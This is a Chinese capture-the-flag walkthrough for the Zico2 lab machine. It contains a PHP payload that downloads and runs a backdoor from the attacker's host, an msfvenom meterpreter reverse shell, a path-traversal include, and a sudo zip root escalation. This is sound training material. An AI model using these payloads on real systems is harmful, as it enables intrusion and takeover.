Zico2

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.154 -p- -A

3、目录扫描

dirsearch -u http://192.168.236.154

二、GetShell

步骤一：访问80端口，发现http://192.168.236.154/view.php?page=tools.html可能存在文件包含漏洞

步骤二：测试是否存在文件包含漏洞

步骤三：扫描目录发现http://192.168.236.154/dbadmin/

步骤四：搜索该cms，发现该版本存在代码注入

searchsploit phpLiteAdmin

步骤五：利用方法：创建数据库，数据库中表的字段写入一句话木马

cat /usr/share/exploitdb/exploits/php/webapps/24044.txt 

步骤六：通过弱口令admin进入phpliteadmin后台，写入<?php phpinfo();?>，之后通过文件包含执行命令

步骤七：可以利用这个漏洞，直接getshell，思路为用kali下msfvenom生成一个后门文件，然后利用之前的漏洞，命令执行，让靶机将后门文件主动下载到本机，然后弹回shell

首先创建后门文件，命令为：msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.137 LPORT=5555 -f elf -o shell.elf，生成一个后门文件，名字为shell.elf

执行命令 cp shell.elf /var/www/html，将后门文件复制到apache的网站根目录

执行命令 chmod 777 /var/www/html/shell.elf，赋予后门文件可读可写可执行权限

执行命令 service apache2 start，启动攻击机的apache服务

步骤八：利用之前的命令执行漏洞，让靶机主动下载该文件

<?php system("cd /tmp;wget http://192.168.236.137/shell.elf;chmod 777 shell.elf;./shell.elf");?>

步骤九：启动 msf，输入命令 msfconsole ，设置之前生成后门文件所使用的payload模块

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lhost 192.168.236.137

set lport 5555

run

步骤十：利用之前的文件包含漏洞，将创建的shell.php执行一下，发现已经成功getshell

http://192.168.236.154/view.php?page=../../../../../../../usr/databases/shell.php

三、提权

步骤一：获取交互式shell

shell
python -c 'import pty; pty.spawn("/bin/bash")' 

步骤二：进入到 /home/zico 目录，查看 to_do.txt 文件

步骤三：进入到wordpress目录下，发下wordpress配置文件，查看此文件，发现账号密码

步骤四：使用 ssh 远程连接

步骤五：输入 sudo -l ，查看哪些命令具有 root 权限

步骤六：可以利用zip命令来进行提权

touch /tmp/exploit，在/tmp目录下创建一个exploit名字的文件

sudo -u root zip /tmp/exploit.zip /tmp/exploit -T --unzip-command="sh -c /bin/bash"

步骤七：进入 /root 目录，查看flag.txt